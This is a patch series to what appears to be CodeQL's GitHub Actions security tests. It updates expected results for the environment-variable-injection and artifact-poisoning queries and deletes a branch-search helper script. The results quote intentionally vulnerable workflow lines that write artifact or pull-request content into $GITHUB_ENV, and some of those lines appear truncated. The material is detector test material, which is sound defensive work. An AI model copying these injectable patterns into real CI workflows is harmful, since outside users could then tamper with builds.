.github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | @@ -79,6 +94,11 @@ nodes | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | subpaths #select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 1ac092dd0d3b..23bc7784f760 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,4 +1,9 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | @@ -25,6 +30,16 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 7aa170a2e988..7a59ab6ec60d 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -11,9 +11,6 @@ edges | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes @@ -38,12 +35,6 @@ nodes | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | @@ -62,9 +53,6 @@ subpaths | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 8d9465077995..2ed89bcb4bc5 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -11,9 +11,6 @@ edges | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes @@ -38,12 +35,6 @@ nodes | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | From 7fa77e2728eead10408dbfa5d076e8f4b25ce8cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:05:00 +0200 Subject: [PATCH 582/707] Delete test script --- search_branches.py | 88 ---------------------------------------------- 1 file changed, 88 deletions(-) delete mode 100644 search_branches.py diff --git a/search_branches.py b/search_branches.py deleted file mode 100644 index d0036169fea3..000000000000 --- a/search_branches.py +++ /dev/null @@ -1,88 +0,0 @@ -import base64 -import os -import re -import sys -import time - -import requests - - -def handle_rate_limit(response, wait_time=60): - return False - - -def search_branches(repo_nwo, file_path, regex_pattern): - # GitHub API base URL - base_url = "https://api.github.com" - - # Get GitHub token from environment variable - github_token = os.environ.get("GITHUB_TOKEN") - if not github_token: - print("Error: GITHUB_TOKEN environment variable not set") - sys.exit(1) - - # Set up headers for authenticated requests - headers = { - "Authorization": f"token {github_token}", - "Accept": "application/vnd.github.v3+json", - } - - # Get all branches (with pagination) - branches_url = f"{base_url}/repos/{repo_nwo}/branches" - branches = [] - while branches_url: - branches_response = requests.get(branches_url, headers=headers) - if handle_rate_limit(branches_response): - continue - branches_response.raise_for_status() - 